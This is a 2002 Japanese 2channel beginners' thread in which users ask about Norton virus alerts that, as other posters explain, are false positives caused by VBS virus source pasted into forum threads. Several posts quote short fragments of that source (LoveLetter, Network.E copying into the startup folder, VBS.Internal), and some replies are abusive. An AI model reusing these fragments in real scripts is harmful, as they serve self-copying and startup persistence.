除外するのがラク。薦めないけどね。

405 :ひよこ名無しさん:02/07/07 03:44 ID:ttbZ24vN
さっき2ちゃんをしていたら
VBS.Internalと言うウイルスハケーン!>(;゚Д゚)
とノーdに言われました。
とりあえず隔離して削除したんですが、この場合後遺症とかありますか?
一応そのあとスキャンしたらなんにもありませんでした。

また上記の時はリンク先に飛んだわけでもなく
普通に2ちゃんを見ていただけなのですが、
突然ノートンが発見するってことは
普段からコンピューター内を巡回してるのかな?

最近WC関係で色々なサイトに飛んでるから
どこかで一緒に拾ってきてしまったのかな。。。

406 :ひよこ名無しさん:02/07/07 03:47 ID:???
( ゚д゚)ポカーン...

407 :ひよこ名無しさん:02/07/07 03:49 ID:???
>>405
すぐ上でその話題出てるだろ

408 :ひよこ名無しさん:02/07/07 03:49 ID:???
( ゚д゚)すげぇや…

409 :ひよこ名無しさん:02/07/07 03:52 ID:ttbZ24vN
>>407

すぐ上ってどのへんっすか?誘導してくれるとうれしーです。
1−20辺りまでしか読んで無かったです。。

410 :ひよこ名無しさん:02/07/07 03:53 ID:???
>>409
最新50以内

411 :ひよこ名無しさん:02/07/07 03:53 ID:???
>>409
文字通りすぐ上です。

412 :ひよこ名無しさん:02/07/07 03:54 ID:???
>>409
WC関連というと、TOTOとかINAX関連ですか?
最新50も読めない人は消えてください

具体的に言うと>>385-404DEATH

413 :ひよこ名無しさん:02/07/07 04:00 ID:ttbZ24vN
誠にすいません。
以前は質問する時は最新50を見てたんだけど、
似た質問がいつも無いもので、最近見てなくて。。。
反省しますた。

414 :ひよこ名無しさん:02/07/07 04:02 ID:???
>>412

>>1-20を読んでたというんだから
消えてくださいとまで言うことないだろ。

415 :ひよこ名無しさん:02/07/07 04:05 ID:???
消えて下さいは言い過ぎだと思うけど
どっかのスレで引っかかったなら
他にも被害者がいるはず->既出の質問->検索
と考えて欲しいなぁ

416 :ひよこ名無しさん:02/07/07 04:07 ID:???
2ch閲覧とノートンの警告とが関係あるとは思わなかったんだろうさ。

417 :ひよこ名無しさん:02/07/07 04:09 ID:ttbZ24vN
暴言を吐きつつも教えてくれて実はとってもいい人なんだぁー
と思ってます。
>>415
どこのスレで引っかかったのかよくわかんないんです。
雑談系の板なんで。。。

あとWC関係で逝ったサイトで拾ってきたフラッシュ等に
ウイルスがあったりしたのかなぁ、とも思ってました。
出所がよく分からなかったんで質問させていただきますた。。
すいませんす。

418 :ひよこ名無しさん:02/07/07 04:12 ID:???
>>417
なんで>>1-20を読んでいるのにフラッシュとかDLしてスキャンしないんだ?
DLしたらスキャンする、当然だろ?

419 :ひよこ名無しさん:02/07/07 04:15 ID:???
暴言なんて2chじゃ挨拶みたいなもんだろ(w
それが嫌なら2chに来なけりゃいい
他にもいろいろあるんだからな

420 :ひよこ名無しさん:02/07/07 04:18 ID:ttbZ24vN
まだ見てなかったから、あとでいいかなと思って。
べつにフラッシュに確実にある!と思ってたわけじゃなく
どっかのサイトに行ったときにもらって来たのかなぁとかも思ったり。
ブラクラチェッカーやって飛んだわけじゃなかったんで。。。

普段、安全そうなサイト以外リンク先に飛ばないんだけど
今回ちょっとWCではしゃぎすぎますた。
反省。
それでちょっと不安になって。


421 :ひよこ名無しさん:02/07/07 04:19 ID:???
>>420
ダウンロードファイルをウイルススキャンしない理由になってない

422 :ひよこ名無しさん:02/07/07 04:20 ID:ttbZ24vN
次はもうちょっと調べてからちゃんと質問します。
どうもありがd。

423 :ひよこ名無しさん:02/07/07 04:22 ID:ttbZ24vN
>>421
いや、後で(フラッシュを)見るときに(スキャン)しようと思ってました、
というニュアンスで書いたんですけど。。

424 :ひよこ名無しさん:02/07/07 04:35 ID:???
>>423 ハァ?

425 :ひよこ名無しさん:02/07/07 04:43 ID:???
ニュアンスとか言ってないで明記しろよ。
それはさておき、そもそもファイル感染型ウイルスに対する
認識がまちがってる。

426 :ひよこ名無しさん:02/07/07 04:45 ID:???
確かに。感染したら駆除すればいい、とか考えてるやつ多いね。
ガードしてこそのアンチウィルスソフトなのに…

427 :ひよこ名無しさん:02/07/07 04:49 ID:???
こういうヤシに限って1年前の定義ファイルだったりするんだ、これが。

428 :ひよこ名無しさん:02/07/07 04:58 ID:???
一人で絡んで楽しいのか。
スルーしろ。

429 :WC関連というと、TOTOとかINAX関連ですか?:02/07/07 05:02 ID:???


430 :ひよこ名無しさん:02/07/07 05:06 ID:???
thorough though though through thorough though thorough

431 :ひよこ名無しさん:02/07/07 05:17 ID:???
>>428=>>429=>>430 おまえがスルーしろ

432 :ひよこ名無しさん:02/07/07 05:22 ID:???
いやいや、おまえもスルーしろ

433 :ひよこ名無しさん:02/07/07 05:29 ID:???
★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

★初心者ほど簡単にウイルスに感染します。

★古いウイルス定義は意味がない! 常に最新のものを!

★「Re:」という題名のメールで添付ファイルが届いたら>>6>>12を読もう!

★突然、女性の顔写真が画面いっぱいに表示されたら>>13を読もう!

★悪質なワーム・Klez.Eの亜種が流行しはじめています。対策は十分に!
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

★JS_EXCEPTIONが流行中。勉強しておきましょう。
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

★patch.exeという添付ファイルつきのメールはウイルスですよ。
  http://www.trendmicro.co.jp/virusinfo/news2002/worm_fbound_b.asp
  http://www.symantec.com/region/jp/news/year02/020314.html
  http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Fbound.c@MM

★jdbgmgr.exeがウイルスだというデマメールが流行しています。騙されないように。
  http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/false/jdbgmgr.asp

★これらのURLはHDDを綺麗サッパリ消去してくれるので絶対踏まない事!!
〜//80s/puolnau/syokusya.zip
〜/tbtb/apuroda/file/153.lzh
〜/uni.s2.xrea.com/tbtb/apuroda/file/153.lzh
〜/source/hoge00110_20020623033541.lzh

434 :   :02/07/07 08:08 ID:zIFMDvwA
VBS.Network
VBS .Internal
VBS .Love letter.A

2chを見てただけなのにこれがウィルスとして出できた場合誤作動です
気にせず2chを見続けなさい

435 :ひよこ名無しさん:02/07/07 09:50 ID:???
ウイルスでしょうか?なんて質問する前にスキャンしる

436 :ひよこ名無しさん:02/07/07 09:57 ID:???
そだ!

ウイルスでしょうか?なんて聞き飽きた

437 :ひよこ名無しさん:02/07/07 10:17 ID:???
なんで「ウイルスでしょうか?」って質問を禁止しないんだろう・・・

438 :ひよこ名無しさん:02/07/07 10:19 ID:???
誰もテンプレに追加しようとしないあkら

439 :ひよこ名無しさん:02/07/07 10:41 ID:???


440 :ひよこ名無しさん:02/07/07 12:20 ID:???
2チャンしてたら二日続けて
VBS .Internalを検出。
心臓に悪いよ。このスレ読んで納得。
削除しきれてなくてまた感染したのかと思った。
web制作のどこかのスレだな。

441 :ひよこ名無しさん:02/07/07 12:45 ID:???
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/



1 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
只今2chでvbsのウィルスのソースを貼り
ノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるので
このスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応
このスレで報告願えると幸いです。

基本(この問題について) >>2
既知の2chで話題になってるvbsソース >>3

2 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■この問題について■

2chのスレにvbsウィルスのソースを書き込むことによって
ブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたと
ノートン先生などが騒ぎます。(設定によっては反応しないことも
ありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されること
は無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダに
htmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
なので、まだ2chで話題に上がって無くても、Internet〜フォルダの
htmlファイルが感染したと警告が出た場合、同じ問題だと言えます。
(もちろん、全く問題無い)
これらのファイルは削除しても全く問題ありませんが、
該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされて
しまうので、警告が出ます。

3 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■既知のvbsウィルスのソース■

・VBS.Internal
出元はhttp://tmp.2ch.net/test/read.cgi/download/1025717301/
の197だと思われる。
ダウソ板からいろんな板へ飛び火した模様。

・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)
出元不明。ニュー速から?

442 :ひよこ名無しさん:02/07/07 13:35 ID:???
参考
LOVE LETTER
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

VBS.Network.E
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

VBSInternal
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"

VBS Freelink.B
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)


443 :ひよこ名無しさん:02/07/07 13:37 ID:???
どっかに隔離スレあったろ?そこへの誘導リンクだけにしてくれ。コード貼るなよ。

444 :ひよこ名無しさん:02/07/07 14:01 ID:???
あー。むかつく。ここしばらくsage進行してください。
上にあると初心者スレあけるだけでもいちいちチェック
入りますんで

445 :ひよこ名無しさん:02/07/07 14:03 ID:???
お前にむかついた。

446 :(ノ_-;)ハア…:02/07/07 14:07 ID:???
>>444
じゃ、違うとこでスレッド出せば良いじゃん…


447 :ひよこ名無しさん:02/07/07 14:45 ID:???
test

448 :ひよこ名無しさん:02/07/07 14:56 ID:???
best

449 :ひよこ名無しさん:02/07/07 15:00 ID:???
>>441

450 :おながいします:02/07/07 15:11 ID:???
このスレはさげでよろしこ。
のーとんが五月蝿くて・・・

451 :ひよこ名無しさん:02/07/07 15:12 ID:???
>>450
あー。むかつく。ここしばらくsage進行してください。
上にあると初心者スレあけるだけでもいちいちチェック
入りますんで

お前がむかつく

452 :ひよこ名無しさん:02/07/07 15:15 ID:???
>>445
>>451
脊髄反射ワロタ 漏れはのーとんいれてないよw

453 :ひよこ名無しさん:02/07/07 15:17 ID:???
c.Copy(dirsystem&"\



ふざけるな!



.TXT.vbs")


454 :(ノ_-;)ハア…:02/07/07 15:59 ID:???
だから、どっか行けってばさ。

455 :444嫌い:02/07/07 16:15 ID:???
age

456 :ひよこ名無しさん:02/07/07 17:08 ID:???
あgr

457 :ひよこ名無しさん:02/07/07 17:43 ID:???
 

458 :ひよこ名無しさん:02/07/07 18:54 ID:???
あの〜・・・
ウイルスに感染したみたいなんですけど・・
なんかスレ開いた瞬間に。
新種のウイルスでしょうか?
アタフタしてます。
助けてください。

459 :ひよこ名無しさん:02/07/07 18:55 ID:???
>>458

しるかボケ

460 :ひよこ名無しさん:02/07/07 18:56 ID:???
>>1
マルチすな!

461 :ひよこ名無しさん:02/07/07 19:05 ID:???
>458
今すぐネットから切断して
ウィルス対策ソフトを買ってきてそれで駆除しなさい

その状態でネットにつないでいるだけで
君が知らないうちにウィルスをばら撒き他人に迷惑をかけます
最悪の場合、企業が被害を被って億単位の損害賠償を請求されます

462 :ひよこ名無しさん:02/07/07 19:09 ID:???
>>458
さげ、じゃねーよカス
質問時のルールも守れねーのかノータリン
脳味噌まで悪質なウイルスにやられてんじゃねーのか?
二度と来んな氏ねボケ

463 : :02/07/07 19:45 ID:???
そんなことよりさ、ちょいと聞いてくれよ。スレにあんま関係ないんだけどさ。

このあいだ、久々に2ch覗いたんです。2ch。
そしたらなんか半角板のスレ開いたらパソコンが変な動きするんです。
で、よく見たらなんかノーd先生が警告出して騒いでるんです。
で、ウイルススレ見てみたらどうやら原因は先生の誤反応なんです。
もうね、先生アホかと。馬鹿かと。
先生な、普段仕事してないのに厨房コピペに一々反応なんかすんな、ボケが。
厨房のコピペだよ、コピペ。
なんか親子連れとかも助けてレスしてるし。一家4人で誤反応か。おめでてーな。
よーしパパセキュリティー板で原因聞いちゃうぞー、とか言ってるの。もう見てらんない。
お前らな、マカフィーやるから安心しろと。
誤反応ってのはな、もっと殺伐としてるべきなんだよ。
ノーd先生がいつ誤反応しちまってもおかしくない、
反応するか反応しないかの、そんな雰囲気がいいんじゃねーか。女子供は、すっこんでろ。
で、やっと騒ぎが収まったかと思うと、ウイルス対策スレがいっぱい立ってるんです。
そこでまたぶち切れですよ。
あのな、対策スレなんてきょうび流行んねーんだよ。ボケが。
得意げな顔して何が、誤反応に注意!だ。
お前は本当に2chネラーかと問いたい。問い詰めたい。小1時間問い詰めたい。
お前、他人から仕入れたその場限りの知識で自慢したいだけとちゃうんかと。
先生通の俺から言わせてもらえば今、先生通の間での最新流行はやっぱり、
コールセンターに電話、これだね。
あのー誤反応がすごいんですけど。厨房対策に誤反応多めにしてくれ。これが通の頼み方。
しかしこれを頼むと次から死満テックにマークされるという危険も伴う、諸刃の剣。
素人にはお薦め出来ない。
まあお前ら、ド素人は、マカフィーでもインストしてなさいってこった。
    


464 :ひよこ名無しさん:02/07/07 19:51 ID:???
意味不明。

465 : :02/07/07 19:55 ID:???
>>463

ワラタ

466 :ひよこ名無しさん:02/07/07 20:10 ID:???
芸能速報板を見てる時にNorton先生が作動し、Temporary Filesを隔離。
ビクーリしてこのスレを訪れたが、そういうことだったのか。。。
落ち着いて過去レス読んでよかった。


467 :ひよこ名無しさん:02/07/07 20:11 ID:???
藁江内

468 :ひよこ名無しさん:02/07/07 20:12 ID:???
>>466
だから?

469 :ひよこ名無しさん:02/07/07 20:16 ID:???

   ∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ( ´Д`)< だから?って言われてモナー……
  (    )  \____________
  | | |
  (__)_)



470 :  :02/07/07 20:41 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)

これなに?
なんかウイルスで引っかかったんだけど・・・


471 :ひよこ名無しさん:02/07/07 20:42 ID:???
>>470
何で貼るんだよ。

472 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/07 20:43 ID:???
>>470
直訳してスペシャルフォルダの1(デスクトップ?スタートアップ?)にテキストファイル作成。
今流行ってる奴ですな。

473 :ひよこ名無しさん:02/07/07 20:44 ID:???
>>470
マルチで貼り付けるな。氏ねよ・・・

      ∧_∧          _ _     .'  , .. .∧__ >
     ( ´_ゝ`)   _ .- ― .= ̄  ̄`:, .∴ '     ( 470 )
    /     '' ̄      __――=', ・,‘ r⌒> _/ /
   / /\   / ̄\-―  ̄ ̄   ̄"'" .   ’ | y'⌒  ⌒i

474 :ひよこ名無しさん:02/07/07 20:48 ID:???
>>470
マルチで貼り付けるな。氏ね!バカ!!

      ∧_∧          _ _     .'  , .. .∧__ >
     ( ´_ゝ`)   _ .- ― .= ̄  ̄`:, .∴ '     ( 470 )
    /     '' ̄      __――=', ・,‘ r⌒> _/ /
   / /\   / ̄\-―  ̄ ̄   ̄"'" .   ’ | y'⌒  ⌒i


475 :ひよこ名無しさん:02/07/07 21:07 ID:???
これなに?

と原因を特定できてる時点で愉快犯決定。
500回氏ね。

476 :ひよこ名無しさん:02/07/07 21:08 ID:???
>470
お前を削除したい。

477 :ひよこ名無しさん:02/07/07 21:08 ID:???
>>475
禿同!アク禁にしてほすい

478 :ひよこ名無しさん:02/07/07 21:12 ID:???
またまどかタンのようにしばらくこの質問絶えないんだろうか…

479 :ひよこ名無しさん:02/07/07 21:19 ID:???
>>478
多分な。ノートンが反応してオロオロするヤシばっか。

480 :ひよこ名無しさん:02/07/07 21:23 ID:???
オートスキャン解除すればいいのか。

481 :ひよこ名無しさん:02/07/07 21:27 ID:???
>>480
それ危険な気がする

482 :ひよこ名無しさん:02/07/07 21:29 ID:???
>>480
2ちゃん専用ブラウザを使っている場合は、
ログ保存フォルダを「除外」に設定すると(・∀・)イイ!!

483 :ひよこ名無しさん:02/07/07 21:31 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

★初心者ほど簡単にウイルスに感染します。

★古いウイルス定義は意味がない! 常に最新のものを!

★「Re:」という題名のメールで添付ファイルが届いたら>>6>>12を読もう!

★突然、女性の顔写真が画面いっぱいに表示されたら>>13を読もう!

★悪質なワーム・Klez.Eの亜種が流行しはじめています。対策は十分に!
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

★JS_EXCEPTIONが流行中。勉強しておきましょう。
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

★patch.exeという添付ファイルつきのメールはウイルスですよ。
  http://www.trendmicro.co.jp/virusinfo/news2002/worm_fbound_b.asp
  http://www.symantec.com/region/jp/news/year02/020314.html
  http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Fbound.c@MM

★jdbgmgr.exeがウイルスだというデマメールが流行しています。騙されないように。
  http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/false/jdbgmgr.asp

★これらのURLはHDDを綺麗サッパリ消去してくれるので絶対踏まない事!!
〜//80s/puolnau/syokusya.zip
〜/tbtb/apuroda/file/153.lzh
〜/uni.s2.xrea.com/tbtb/apuroda/file/153.lzh
〜/source/hoge00110_20020623033541.lzh

484 :ひよこ名無しさん:02/07/07 22:23 ID:???
NAV2002でウイルス定義最新、AutoProtectありで>>470のが別に反応しないんだけど、
すべてのノートンで反応する?

485 :ひよこ名無しさん:02/07/07 22:26 ID:???
うちのスコット・ノートンは激しく反応しましたよ

486 :ひよこ名無しさん:02/07/08 00:49 ID:e+/4p6zw
今日初めてシマンティックのオンラインスキャンというのをしたのですが
その結果
c:\WINDOWS\Temporary Internet Files\Content.IE5\0DA7SXQB\l50[3] は 次のウィルスに感染しています: VBS.LoveLetter.A
と、感染してるといわれました。
感染したのは2時間前らしいのですが何が原因かわかりません・・
何をしたらいいのかもわからず、とりあえず感染したファイルを削除したのですが
このウイルスについて調べるとファイルを書き換え・・と書かれてたので
対処法のページを色々読みました。
そしたらまず最新ウイルス定義をDLとかかれてたのでDLしようとしたんですけど
どれをDLしたらいいのかわかりません。
どなたか詳しく教えてください・・お願いします。



487 :ひよこ名無しさん:02/07/08 00:50 ID:???
>>486
このスレ、よく読め!書いてある

488 :ひよこ名無しさん:02/07/08 00:50 ID:???
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/



1 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
只今2chでvbsのウィルスのソースを貼り
ノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるので
このスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応
このスレで報告願えると幸いです。

基本(この問題について) >>2
既知の2chで話題になってるvbsソース >>3

2 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■この問題について■

2chのスレにvbsウィルスのソースを書き込むことによって
ブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたと
ノートン先生などが騒ぎます。(設定によっては反応しないことも
ありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されること
は無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダに
htmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
なので、まだ2chで話題に上がって無くても、Internet〜フォルダの
htmlファイルが感染したと警告が出た場合、同じ問題だと言えます。
(もちろん、全く問題無い)
これらのファイルは削除しても全く問題ありませんが、
該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされて
しまうので、警告が出ます。

3 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■既知のvbsウィルスのソース■

・VBS.Internal
出元はhttp://tmp.2ch.net/test/read.cgi/download/1025717301/
の197だと思われる。
ダウソ板からいろんな板へ飛び火した模様。

・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)
出元不明。ニュー速から?

489 :ひよこ名無しさん:02/07/08 00:50 ID:???
>>486
もう一回スキャンかけてみれ。

んで、さっさとウィルス駆除ソフト買って来い。

490 :ひよこ名無しさん:02/07/08 00:51 ID:e+/4p6zw
>>487
今から読んでみます。すいません。

491 :初心者向けスレッド:02/07/08 00:52 ID:???
http://pc.2ch.net/test/read.cgi/win/1024932195/-100
必ず読め!必ず読め!必ず読め!必ず読め!必ず読め!
必ず読め!必ず読め!必ず読め!必ず読め!必ず読め!

492 :ひよこ名無しさん:02/07/08 00:55 ID:???
VBS.Freelink.Bに感染してから、妙にPCが重くなりました。
それとシステムのプロパティのシステムの復元ってとこを見ると「監視」になってたはずが
CドライブもDドライブも停止になってます。

これはやはりウィルスのせいですか?それと対処方法を教えてください。
ちなみに最新版のノートン先生ではウィルス検出されなくなりました。

493 :ひよこ名無しさん:02/07/08 00:56 ID:???
>>492
デフラグしてみろ

494 :492:02/07/08 01:00 ID:???
デフラグしようと見たら妙にCドライブの空きが少なくなってる・・・。

495 :ひよこ名無しさん:02/07/08 01:01 ID:???
>>494
作動はどうなんだ?

496 :492:02/07/08 01:07 ID:???
いま終わりましたが。
断片化されたファイルが増えてます。

497 :ひよこ名無しさん:02/07/08 01:10 ID:???
>>496
つーか、IDも出さないヤシには、教えられんな

498 :492:02/07/08 01:14 ID:???
>>497
なんだとぉ!ゴルァ!

499 :492:02/07/08 01:14 ID:???
すみませんネタで下も浮きません

500 :492:02/07/08 01:15 ID:???
にせものはやめて下さい!

501 :492:02/07/08 01:16 ID:???
にせものは市ねよヴォケ・・・

      ∧_∧          _ _     .'  , .. .∧__ >
     ( ´_ゝ`)   _ .- ― .= ̄  ̄`:, .∴ '     ( 偽者 )
    /     '' ̄      __――=', ・,‘ r⌒> _/ /
   / /\   / ̄\-―  ̄ ̄   ̄"'" .   ’ | y'⌒  ⌒i

502 :ひよこ名無しさん:02/07/08 01:16 ID:???
492は放置ケテーイ  

503 :492:02/07/08 01:16 ID:KgzIDUyZ
ん?ここsage進行じゃないの?
つか、またウィルス感染した・・・。

504 :ひよこ名無しさん:02/07/08 01:17 ID:???
>>503
そんなん、知らんがな

505 :ひよこ名無しさん:02/07/08 01:18 ID:???
>>503
しかも、ageてるし

506 :ひよこ名無しさん:02/07/08 01:18 ID:SbEa5ALr
ある日を境に、W32.Klez系のウィルスメールが日に10通ぐらい
おくれらて来るようになってしまいました。アンチウィルスソフトを
入れてあるので、実害にはあっていませんが、とてもうざいです。
これって誰かに狙い打ちされてる可能性ってあるんでしょうか?
それとも全てウィルスに感染した
PCから送られてきてしまうものなのでしょうか?
また全部見覚えのないアドレスばかりから送信されてくるのですが、
これらのアドレスはすべて本物なのでしょうか?
それともフェイクのアドレスってことも
ありえますか?

507 :ひよこ名無しさん:02/07/08 01:19 ID:???
>>506
ほっとけ

508 :ひよこ名無しさん:02/07/08 01:20 ID:???
>>506
そんなもんほっとけば?ヤならネットすんなよ

509 :492:02/07/08 01:28 ID:KgzIDUyZ
初期化したばっかで消えてまずいファイルもないし、なんかおもしろいから
しばらくほっとくことにします。ありがとう。

510 :◆WINMEi3Y :02/07/08 01:28 ID:???
>>492
自分でシステムの復元を停止にしたのを忘れてるんじゃないの?
と言ってみるテスト。
システムの復元を停止にすればCドライブの空き容量も増えるし。

>>506
感染者が気づかないうちにKLEZが勝手に送信してるのがほとんど。
メルアドを詐称するのもKLEZの亜種の特徴。
メーラーの設定で送信者を禁止にするなど。

511 :506:02/07/08 01:34 ID:SbEa5ALr
>>510
ありがとうございました。ちょっと安心しました。
ほんと厨房でよくわかんないで。


512 :ひよこ名無しさん:02/07/08 01:49 ID:hfeWW+8t
最近2chの板(なんの板かは忘れました)をクリックすると、
たまにノートンアンチウィルスが反応してvbs.network.eやvbs.loveletter.aが出るんです。
これはなぜですか?
普通のことなんですか?
厨房発言お許し下さい。

513 :ひよこ名無しさん:02/07/08 01:50 ID:???
>>512
このスレ嫁!馬鹿かあんたは

514 :ひよこ名無しさん:02/07/08 01:50 ID:???
>>512
このスレッドを最初から最後まで読めばわかるよ。
全部読まなくてもちょっと上にもあるし。
まぁ一言で言えば誤作動。

515 :冷やし職人 ◆R0lAe0RQ :02/07/08 01:53 ID:???
>>512
>>488がいいかな

516 :512:02/07/08 01:57 ID:hfeWW+8t
>>513-515
すいません、俺がばかでした。首吊って逝ってきます・・・

517 :ひよこ名無しさん:02/07/08 01:59 ID:???
>>516
ヽ(´ー`)ノキニシナーイ

518 :ひよこ名無しさん:02/07/08 02:05 ID:???
>>516
少なくとも、近々のレスは読んでから質問した方がいいよ


519 :助けてください:02/07/08 02:27 ID:8iJMFnB4
windows meを使用しているのですが、ある日新しいソフトを買って
インストールしようとしたら青い画面に切り替わってエラーの表示が
出ました。その後フリーズ状態になり、なんどくり返しても同じ状態
になります。又、普通のCDを入れても同じ状態になります。DVDソフトは
普通に再生できます。ウィルスかと思いウィルスバスターで検索したところ
、最後の方で又同じ症状になってしまいました。原因はなんなのでしょうか?
またどうすれば直るのでしょうか?どうか助けてください。

520 :冷やし職人 ◆R0lAe0RQ :02/07/08 02:35 ID:???
>>519
リカバリ、これ最強にして最短です。はい

少し気になったんですが、同じような機能のソフトを複数
インストールしてませんか?OSが不安定になる事がまれにあります

521 :長文失礼します:02/07/08 02:38 ID:BfvF6ldU
はじめてノートン先生にウイルス警告をもらってパニック状態です。
(LoveletterAとFreeLinkBとかいうやつです)
このスレを参考に、インターネット一時ファイルは削除しました。
最新ウイルス定義でスキャンした限りでは感染も見つかっていません。

しかし、警告の前にはなかったDesktop.iniというファイルが
共有ドキュメントやら何やらあらゆる場所に出現しており、
削除しようとすると「システムファイルだから削除するとプログラムが
正常に動かなくなり云々」という表示が出てくるので
どうしたらよいかわかりません。助けてください。
ファイルの中身は
[DeleteOnCopy]
Owner=Owner
Personalized=(数字)……と始まるものです。

ちなみにここ数日、デスクトップ関係で思い当たることといえば
シマンテックのサイトからfixlove.exeというLoveletter駆除ツールを
デスクトップにDLしたことぐらいですが、何か関係があるのでしょうか。
それともやはりウイルスに感染してしまったのでしょうか。
無知ですみません。

522 :ひよこ名無しさん:02/07/08 02:39 ID:???
>>521
ガイシュツ!ウイルススレに逝って下され

523 :ひよこ名無しさん:02/07/08 02:40 ID:???
>>521
ここ読んで!
http://pc.2ch.net/test/read.cgi/pcqa/1025452031/515

524 :ひよこ名無しさん:02/07/08 02:41 ID:XtXy4CyE
変な質問すいません。
検疫とはどういう状態ですか?
また、その場合はどうしたらいいのですか?
現在

VBS.Freelink.B

VBS.Network.E

に感染してます。
どちらも検疫状態です。
よろしくお願いします。



525 :ひよこ名無しさん:02/07/08 02:42 ID:???
>>524
上の方を読んでくだされ

526 :ひよこ名無しさん:02/07/08 03:14 ID:BfvF6ldU
>522-523
すみません。皆さんのレスを読む限りでは
Desktop.iniというファイルが現れているのは自分だけのようなので
とりあえずFixlove.exeをアンインストールしてみました。
しかし各フォルダにはまだDesktop.exeが残っています。
これは削除しても問題ないのかがわからず頭を痛めています。
ひょっとしたら別件に感染したのかと思ってこちらに書き込みました。

527 :526:02/07/08 03:16 ID:BfvF6ldU
訂正
×Desktop.exe
○Desktop.ini です。

528 :ひよこ名無しさん:02/07/08 03:19 ID:???
>>527
削除してもいいかと思われ

529 :ひよこ名無しさん:02/07/08 03:19 ID:???
>>526
こんなん出ました
http://arena.nikkeibp.co.jp/qa/yougo/gaz/you_29/

気にする必要は無いと思われ

530 :ひよこ名無しさん:02/07/08 03:21 ID:???
>>526
大丈夫です
http://arena.nikkeibp.co.jp/qa/yougo/gaz/you_29/
心配ならここを読んでみて

531 :530:02/07/08 03:22 ID:???
誰かぶってよ

532 :ひよこ名無しさん:02/07/08 03:25 ID:???
>>531
ピシピシ

533 :530:02/07/08 03:27 ID:???
(/Д\) イタイヨ 

534 :ひよこ名無しさん:02/07/08 03:31 ID:???
>>533
じゃ、ピチピチ。痛いかな?

535 :530:02/07/08 03:34 ID:???
(・∀・) 

536 :ひよこ名無しさん:02/07/08 03:35 ID:???
>>535
えーい、こいつぅ・・・・デコピン!

537 :530:02/07/08 03:40 ID:???
( o^〜^)ノ

538 :ひよこ名無しさん:02/07/08 03:41 ID:???
>>537
憂いヤツ(w

539 :ひよこ名無しさん:02/07/08 03:45 ID:2yLWmQSH
VBS.LoveLetter.A (LoveLetter)に感染してしまいました。
ノートンでは修復できませんでした…
どうしたら良いでしょうか?


540 :ひよこ名無しさん:02/07/08 03:49 ID:???
>>539
>>488を読んでみて。

541 :ひよこ名無しさん:02/07/08 03:51 ID:???
>>539
質問の前に、最近のレスは読んでおこうよね

542 :526:02/07/08 03:58 ID:BfvF6ldU
皆さんどうもありがとうございました。これで安心して寝られます。

543 :ひよこ名無しさん:02/07/08 04:00 ID:???
>>542
( ゚д゚)ノ_ ホレ、マクラ

544 :メルトダウン:02/07/08 08:07 ID:???
